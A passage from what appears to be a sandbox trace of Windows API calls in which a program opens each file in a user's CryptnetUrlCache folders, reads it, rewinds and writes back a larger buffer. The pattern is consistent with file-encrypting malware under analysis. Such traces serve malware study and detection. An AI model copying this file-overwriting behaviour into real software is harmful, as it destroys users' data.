cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0174.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpUsedDefaultChar=0x0) returned 65 [0174.484] ReadFile (in: hFile=0x20c, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x58b, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x311f2bc*=0x58b, lpOverlapped=0x0) returned 1 [0174.485] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0174.486] WriteFile (in: hFile=0x20c, lpBuffer=0x25add38*, nNumberOfBytesToWrite=0xb13, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25add38*, lpNumberOfBytesWritten=0x311f2d0*=0xb13, lpOverlapped=0x0) returned 1 [0174.486] CloseHandle (hObject=0x20c) returned 1 [0174.486] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0174.486] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.487] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x648 [0174.487] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.487] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.487] ReleaseMutex (hMutex=0x168) returned 1 [0174.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0174.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpUsedDefaultChar=0x0) returned 65 [0174.487] ReadFile (in: hFile=0x20c, lpBuffer=0x26cf6b8, nNumberOfBytesToRead=0x648, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesRead=0x311f2bc*=0x648, lpOverlapped=0x0) returned 1 [0174.512] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0174.512] WriteFile (in: hFile=0x20c, lpBuffer=0x25add38*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25add38*, lpNumberOfBytesWritten=0x311f2d0*=0xbd0, lpOverlapped=0x0) returned 1 [0174.512] CloseHandle (hObject=0x20c) returned 1 [0174.512] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0174.513] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.513] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1cf [0174.514] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.514] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.514] ReleaseMutex (hMutex=0x168) returned 1 [0174.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0174.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpUsedDefaultChar=0x0) returned 65 [0174.514] ReadFile (in: hFile=0x20c, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x311f2bc*=0x1cf, lpOverlapped=0x0) returned 1 [0174.515] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0174.515] WriteFile (in: hFile=0x20c, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x757, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x311f2d0*=0x757, lpOverlapped=0x0) returned 1 [0174.515] CloseHandle (hObject=0x20c) returned 1 [0174.515] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0175.809] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0175.809] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1cf [0175.809] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0175.809] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0175.809] ReleaseMutex (hMutex=0x168) returned 1 [0175.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0175.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", cchWideChar=65, lpMultiByteStr=0x1fac7bc, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpUsedDefaultChar=0x0) returned 65 [0175.809] ReadFile (in: hFile=0x208, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x311f2bc*=0x1cf, lpOverlapped=0x0) returned 1 [0175.834] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0175.834] WriteFile (in: hFile=0x208, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x757, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x311f2d0*=0x757, lpOverlapped=0x0) returned 1 [0177.154] CloseHandle (hObject=0x208) returned 1 [0177.154] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0177.155] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.155] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x652 [0177.155] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.155] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.155] ReleaseMutex (hMutex=0x168) returned 1 [0177.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0177.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", cchWideChar=65, lpMultiByteStr=0x1fac7bc, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpUsedDefaultChar=0x0) returned 65 [0177.156] ReadFile (in: hFile=0x208, lpBuffer=0x26cf6b8, nNumberOfBytesToRead=0x652, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesRead=0x311f2bc*=0x652, lpOverlapped=0x0) returned 1 [0177.157] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.158] WriteFile (in: hFile=0x208, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xbda, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x311f2d0*=0xbda, lpOverlapped=0x0) returned 1 [0177.158] CloseHandle (hObject=0x208) returned 1 [0177.158] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0177.159] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.159] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6e3 [0177.159] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.159] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.159] ReleaseMutex (hMutex=0x168) returned 1 [0177.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0177.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", cchWideChar=65, lpMultiByteStr=0x1fac7bc, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpUsedDefaultChar=0x0) returned 65 [0177.160] ReadFile (in: hFile=0x208, lpBuffer=0x25a96f8, nNumberOfBytesToRead=0x6e3, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a96f8*, lpNumberOfBytesRead=0x311f2bc*=0x6e3, lpOverlapped=0x0) returned 1 [0177.161] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.161] WriteFile (in: hFile=0x208, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xc6b, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x311f2d0*=0xc6b, lpOverlapped=0x0) returned 1 [0177.162] CloseHandle (hObject=0x208) returned 1 [0177.162] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0177.162] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.163] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x226 [0177.163] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.163] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.163] ReleaseMutex (hMutex=0x168) returned 1 [0177.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="F90F18257CBB4D84216AC1E1F3BB2C76", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0177.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="F90F18257CBB4D84216AC1E1F3BB2C76", cchWideChar=32, lpMultiByteStr=0x1fa54dc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="F90F18257CBB4D84216AC1E1F3BB2C76", lpUsedDefaultChar=0x0) returned 32 [0177.163] ReadFile (in: hFile=0x208, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x226, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x311f2bc*=0x226, lpOverlapped=0x0) returned 1 [0177.164] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.164] WriteFile (in: hFile=0x208, lpBuffer=0x28469b8*, nNumberOfBytesToWrite=0x7ae, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28469b8*, lpNumberOfBytesWritten=0x311f2d0*=0x7ae, lpOverlapped=0x0) returned 1 [0177.165] CloseHandle (hObject=0x208) returned 1 [0177.165] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.451] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.451] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x190 [0177.451] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.451] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.451] ReleaseMutex (hMutex=0x168) returned 1 [0177.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0177.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cchWideChar=65, lpMultiByteStr=0x1fac7bc, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpUsedDefaultChar=0x0) returned 65 [0177.451] ReadFile (in: hFile=0x1f0, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x190, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x311f2bc*=0x190, lpOverlapped=0x0) returned 1 [0177.452] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.452] WriteFile (in: hFile=0x1f0, lpBuffer=0x2846ab8*, nNumberOfBytesToWrite=0x718, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2846ab8*, lpNumberOfBytesWritten=0x311f2d0*=0x718, lpOverlapped=0x0) returned 1 [0177.453] CloseHandle (hObject=0x1f0) returned 1 [0177.453] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.458] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.458] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x100 [0177.458] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.458] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.458] ReleaseMutex (hMutex=0x168) returned 1 [0177.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7396C420A8E1BC1DA97F1AF0D10BAD21", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0177.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7396C420A8E1BC1DA97F1AF0D10BAD21", cchWideChar=32, lpMultiByteStr=0x1fa54dc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7396C420A8E1BC1DA97F1AF0D10BAD21", lpUsedDefaultChar=0x0) returned 32 [0177.459] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eea868, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea868*, lpNumberOfBytesRead=0x311f2bc*=0x100, lpOverlapped=0x0) returned 1 [0177.459] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.460] WriteFile (in: hFile=0x1f0, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x688, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x311f2d0*=0x688, lpOverlapped=0x0) returned 1 [0177.460] CloseHandle (hObject=0x1f0) returned 1 [0177.460] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.460] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.460] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x186 [0177.461] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.461] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.461] ReleaseMutex (hMutex=0x168) returned 1 [0177.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0177.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", cchWideChar=65, lpMultiByteStr=0x1fac7bc, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpUsedDefaultChar=0x0) returned 65 [0177.461] ReadFile (in: hFile=0x1f0, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x311f2bc*=0x186, lpOverlapped=0x0) returned 1 [0177.462] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.462] WriteFile (in: hFile=0x1f0, lpBuffer=0x2848ae8*, nNumberOfBytesToWrite=0x70e, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2848ae8*, lpNumberOfBytesWritten=0x311f2d0*=0x70e, 